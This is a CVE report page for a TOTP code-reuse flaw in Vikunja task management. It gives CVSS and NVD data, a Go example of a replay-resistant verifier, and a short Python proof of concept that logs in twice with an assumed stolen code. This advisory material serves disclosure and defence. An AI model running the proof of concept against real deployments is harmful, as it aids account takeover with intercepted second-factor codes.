Security Vulnerability Report
CVE-2026-33473 CVSS 5.7 MEDIUM

CVE-2026-33473

Published: 2026-03-24 16:16:34
Last Modified: 2026-03-27 16:53:33

Description

Vikunja is an open-source self-hosted task management platform. Starting in version 0.13 and prior to version 2.2.1, any user that has enabled 2FA can have their TOTP reused during the standard 30 second validity window. Version 2.2.1 patches the issue.
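The advisory states the failure mode (a TOTP code that has already been used for a successful login is accepted again for the rest of its 30-second step) but not what the fix looks like. The following Go example is added here and is not Vikunja's own code. It implements a minimal RFC 6238 verifier in two forms: codeValid, which accepts any code inside the window without remembering which codes were consumed (the behaviour described above), and Verifier, which records the highest time step each user has already consumed and rejects a second login with the same code. HMAC-SHA1, six digits, a one-step skew allowance on either side and the in-memory per-user map are assumptions for illustration; the secret is the RFC 6238 test vector, so the codes it produces are reproducible.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"errors"
	"fmt"
	"sync"
	"time"
)

// Assumed parameters: HMAC-SHA1, 6 digits, 30-second steps (RFC 6238 defaults).
const totpStepSeconds = 30

// totpCode computes the RFC 4226/6238 code for one time-step counter.
func totpCode(secret []byte, step uint64) string {
	var msg [8]byte
	binary.BigEndian.PutUint64(msg[:], step)
	mac := hmac.New(sha1.New, secret)
	mac.Write(msg[:])
	sum := mac.Sum(nil)
	offset := sum[len(sum)-1] & 0x0f // dynamic truncation
	bin := binary.BigEndian.Uint32(sum[offset:offset+4]) & 0x7fffffff
	return fmt.Sprintf("%06d", bin%1000000)
}

// stepAt converts wall-clock time into the TOTP counter.
func stepAt(t time.Time) uint64 { return uint64(t.Unix()) / totpStepSeconds }

// window returns the steps a verifier will accept: current step plus one of skew each side.
func window(now time.Time) []uint64 {
	cur := stepAt(now)
	return []uint64{cur - 1, cur, cur + 1}
}

// codeValid is the unpatched behaviour: any code that matches a step in the window
// is accepted, however many times it has already been used.
func codeValid(secret []byte, code string, now time.Time) bool {
	for _, s := range window(now) {
		if hmac.Equal([]byte(totpCode(secret, s)), []byte(code)) {
			return true
		}
	}
	return false
}

var (
	ErrInvalid = errors.New("totp: invalid code")
	ErrReplay  = errors.New("totp: code already used")
)

// Verifier is the hardened form: it remembers, per user, the highest time step
// consumed by a successful login and refuses any code at or below it (RFC 6238
// section 5.2). A real deployment would persist lastStep next to the user's
// secret in the database; the map here is an illustration only.
type Verifier struct {
	mu       sync.Mutex
	lastStep map[string]uint64
}

func NewVerifier() *Verifier { return &Verifier{lastStep: map[string]uint64{}} }

// Verify accepts a code once. A repeat inside the same window returns ErrReplay.
func (v *Verifier) Verify(user string, secret []byte, code string, now time.Time) error {
	v.mu.Lock()
	defer v.mu.Unlock()
	for _, s := range window(now) {
		if !hmac.Equal([]byte(totpCode(secret, s)), []byte(code)) {
			continue
		}
		if last, seen := v.lastStep[user]; seen && s <= last {
			return ErrReplay
		}
		v.lastStep[user] = s
		return nil
	}
	return ErrInvalid
}

func main() {
	secret := []byte("12345678901234567890") // RFC 6238 test secret (constructed sample)
	now := time.Unix(59, 0)                  // step 1; code is 287082 per the RFC vector
	code := totpCode(secret, stepAt(now))
	fmt.Println("unpatched, second use accepted:", codeValid(secret, code, now) && codeValid(secret, code, now))
	v := NewVerifier()
	fmt.Println("patched, first use:", v.Verify("alice", secret, code, now))
	fmt.Println("patched, reuse 10s later:", v.Verify("alice", secret, code, now.Add(10*time.Second)))
}
```

The replay check lives inside the matched step rather than on the raw string so that a code from the skewed next step, once consumed, also blocks the current step's code; that is the ordering RFC 6238 recommends and it costs one integer per user in storage.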

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja >= 0.13, < 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# Conceptual Proof of Concept (PoC) for CVE-2026-33473
# This script demonstrates the reuse of a TOTP code within the validity window.

TARGET_URL = "https://example.com/api/v1/login"
USERNAME = "user@example.com"  # placeholder test account
PASSWORD = "user_password"
# Assume this TOTP code was intercepted or stolen
STOLEN_TOTP = "123456"


def login_with_totp(totp_code):
    """Submit username, password and TOTP to the login endpoint; True on HTTP 200."""
    session = requests.Session()
    payload = {
        "username": USERNAME,
        "password": PASSWORD,
        "totp_passcode": totp_code,
    }
    response = session.post(TARGET_URL, json=payload, timeout=10)
    return response.status_code == 200


print("[*] Attempting first login with TOTP:", STOLEN_TOTP)
if login_with_totp(STOLEN_TOTP):
    print("[+] Login 1 successful.")
else:
    print("[-] Login 1 failed.")
    sys.exit(1)

# Both requests must land inside the same 30-second TOTP step, so do not wait between them.
print("[*] Attempting second login with SAME TOTP:", STOLEN_TOTP)
if login_with_totp(STOLEN_TOTP):
    print("[+] Login 2 successful. TOTP code was reused!")
    print("[!] Vulnerability confirmed.")
else:
    print("[-] Login 2 failed. System may be patched.")

References

https://github.com/go-vikunja/vikunja/security/advisories/GHSA-p747-qc5p-773r (Exploit, Vendor Advisory)
https://vikunja.io/changelog/vikunja-v2.2.0-was-released (Release Notes)
https://vikunja.io/changelog/vikunja-v2.2.2-was-released (Release Notes)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33473",
    "sourceIdentifier": "security-advisories@github.com",
    "published": "2026-03-24T16:16:33.710",
    "lastModified": "2026-03-27T16:53:32.720",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vikunja is an open-source self-hosted task management platform. Starting in version 0.13 and prior to version 2.2.1, any user that has enabled 2FA can have their TOTP reused during the standard 30 second validity window. Version 2.2.1 patches the issue."
      },
      {
        "lang": "es",
        "value": "Vikunja es una plataforma de gestión de tareas de código abierto autoalojada. A partir de la versión 0.13 y antes de la versión 2.2.1, cualquier usuario que haya habilitado 2FA puede ver su TOTP reutilizado durante la ventana de validez estándar de 30 segundos. La versión 2.2.1 corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security-advisories@github.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
            "baseScore": 5.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security-advisories@github.com",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-287"}]
      },
      {
        "source": "nvd@nist.gov",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "0.13",
                "versionEndExcluding": "2.2.1",
                "matchCriteriaId": "A9EDB458-A25F-4E79-A8D5-340826D95EB6"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-p747-qc5p-773r",
        "source": "security-advisories@github.com",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released",
        "source": "security-advisories@github.com",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released",
        "source": "security-advisories@github.com",
        "tags": ["Release Notes"]
      }
    ]
  }
}